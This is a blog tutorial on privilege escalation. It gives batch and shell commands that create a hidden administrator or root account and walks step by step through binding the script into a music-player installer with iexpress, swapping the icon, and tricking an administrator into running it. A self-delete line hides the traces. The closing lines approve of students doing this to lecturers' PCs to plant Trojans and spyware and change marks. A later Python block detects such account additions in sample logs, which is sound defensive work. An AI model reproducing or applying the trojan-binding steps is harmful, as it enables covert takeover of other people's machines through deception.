Monday, January 23, 2012

Privilege Escalation



As we discussed earlier, enumeration only means the identification of information that can be used to intrude into a system. An attacker needs a weak user account to get in; it does not matter whether that account has administrative privileges or not, because it is the attacker's job to grant himself/herself administrative privileges or to add a new account that will have administrative privileges for him/her.
The process of turning a normal user into a super user is known as privilege escalation. An attacker will try by all means to become super user. He/she can do this manually or with tools; for now we will learn how he/she can set things up manually to escalate privileges. We will also cover the tools that can be used for this, but later, not now.

Once an attacker is in, he/she may get rights to use devices, files and folders on the system. Even if he/she is not a super user, he/she will have rights to use shared network folders and might even have rights to copy data into them. This is where the attacker will do his/her job of creating a user with administrative privileges or adding himself/herself as a user with administrative privileges.

To add a user with administrative privileges, open Notepad, type the following commands and save the file as a batch script (.bat extension):

@echo off
REM create the local account "Nrupen" with password "12345678"
net user Nrupen 12345678 /add
REM put that account into the local Administrators group
net localgroup administrators Nrupen /add

The above script will add a user named Nrupen with the password 12345678 and give it administrative privileges. To make an existing user a super user, he/she will type the following commands in the batch script instead (replace user_name with the existing account name):

@echo off
REM add an already existing local account to the Administrators group
net localgroup administrators user_name /add

The disadvantage of the above script is that it appears in a command prompt window when executed, so we have to hide it inside some other program. For demonstration I am using AIMP2, a music player; an attacker will use a program that the administrative user is interested in. To combine programs we can use the “iexpress.exe” wizard built into Windows; the other tool we need is “Resource Hacker”. Open a command prompt and type “iexpress.exe”.
Select “Create New Self Extraction Directive”.
Now select “Extract Files And Run Installation Command”.
Press Next and type the title of the package; use the name of the program you want to bind your script with.
In the confirmation prompt select “No Prompt”, then press Next and select “Do not display license”. Now add your script file and the program file you want to bind.
Now from the “Install Program” option select the program file you want to bind, and in “Post Install Command” select your batch script, or vice versa. Please note that if you add the batch script in this way you will have to add an extra line to the script that deletes the script after execution. So the final script that you will use will have the following lines in it.

@echo off
REM create the local account "Nrupen" with password "12345678"
net user Nrupen 12345678 /add
REM put that account into the local Administrators group
net localgroup administrators Nrupen /add
REM remove the script itself (assumes it was saved as new.bat)
del new.bat

Press Next, then select “Default (recommended)”, then “No message”, choose a location and create the bound file.

When your file has been created you will find that its icon does not look like the original program's; use Resource Hacker to change its icon. At present I am not covering how to use Resource Hacker, so please check its help file to see how to change an icon with it. Now make some provision so that the system administrator executes this bound file. The installation will begin without problems and your script will be executed in the background.
The same effect as the batch script can be achieved on UNIX or Linux systems by typing the following commands in a shell script.

# create the account "Nrupen" with the supplementary group "root"
useradd -G root Nrupen
# set its password to "12345678" (passwd --stdin is the Red Hat/Fedora form)
echo 12345678 | passwd --stdin Nrupen

The above commands will create the user Nrupen with the password 12345678 as a member of the root group, which means a super user. Your next step will be to somehow make a super user execute the shell script containing the above code, because in a Unix or Linux environment you do not have ready-made programs that can help you out as you do on Windows. Your knowledge of the Unix and Linux platform should be sound enough to fool a root group member into executing your script.
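From the defender's side, both the Windows batch scripts and the Linux shell script above leave the same footprint: an account is created and then placed in a privileged group. The following detector is an added example, not code from the original post; it runs over constructed sample log lines (the Linux lines follow the messages useradd/usermod write to auth.log, the Windows lines are an assumed simplified "EventID,Account,Group" export of Security events 4720 and 4732) and flags every account added to a privileged group, noting whether it was freshly created or already existed.

```python
import re

# Constructed sample log lines, not real captures.
LINUX_LOG = """\
Jan 23 10:15:01 lab useradd[4121]: new user: name=Nrupen, UID=1001, GID=1001, home=/home/Nrupen, shell=/bin/bash
Jan 23 10:15:01 lab useradd[4121]: add 'Nrupen' to group 'root'
Jan 23 10:15:01 lab useradd[4121]: add 'Nrupen' to shadow group 'root'
Jan 23 11:02:44 lab useradd[4388]: new user: name=intern, UID=1002, GID=1002, home=/home/intern, shell=/bin/bash
Jan 23 12:30:10 lab usermod[4500]: add 'bob' to group 'sudo'
"""
# Assumed export format: EventID,Account,Group (group empty for 4720).
WINDOWS_LOG = """\
4720,Nrupen,
4732,Nrupen,Administrators
4720,svc_backup,
4732,alice,Remote Desktop Users
4732,bob,Administrators
"""

NEW_USER_RE = re.compile(r"useradd\[\d+\]: new user: name=(\S+),")
GROUP_ADD_RE = re.compile(r"(?:useradd|usermod)\[\d+\]: add '([^']+)' to group '([^']+)'")
# Groups whose membership amounts to administrative control on either platform.
PRIV_GROUPS = {"root", "sudo", "wheel", "administrators"}

def find_linux_escalations(log):
    """Return (account, newly_created) for each account added to a privileged group."""
    created, privileged = set(), set()
    for line in log.splitlines():
        m = NEW_USER_RE.search(line)
        if m:
            created.add(m.group(1))
        m = GROUP_ADD_RE.search(line)
        if m and m.group(2).lower() in PRIV_GROUPS:
            privileged.add(m.group(1))
    return sorted((user, user in created) for user in privileged)

def find_windows_escalations(log):
    """Same check over 4720 (account created) / 4732 (member added to local group)."""
    created, privileged = set(), set()
    for line in log.splitlines():
        event_id, account, group = line.split(",", 2)
        if event_id == "4720":
            created.add(account)
        elif event_id == "4732" and group.lower() in PRIV_GROUPS:
            privileged.add(account)
    return sorted((user, user in created) for user in privileged)

if __name__ == "__main__":
    print("linux:", find_linux_escalations(LINUX_LOG))      # [('Nrupen', True), ('bob', False)]
    print("windows:", find_windows_escalations(WINDOWS_LOG))  # [('Nrupen', True), ('bob', False)]
```

A new account that lands in a privileged group within seconds of creation (Nrupen) is the pattern of the first script; an existing account gaining the group (bob) matches the second, so both are worth an alert.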

College students commonly use this Windows privilege escalation trick to fool their lecturers and gain administrative privileges on the lecturer's PC, which is how they become able to install Trojans and spyware on it and alter their assignment marks. In the next section we will look at tools that can be used for privilege escalation, and then at how to execute a process remotely on the victim's PC. Until then, if you have any questions, please don't hesitate to ask. Thanks for reading and keep visiting.
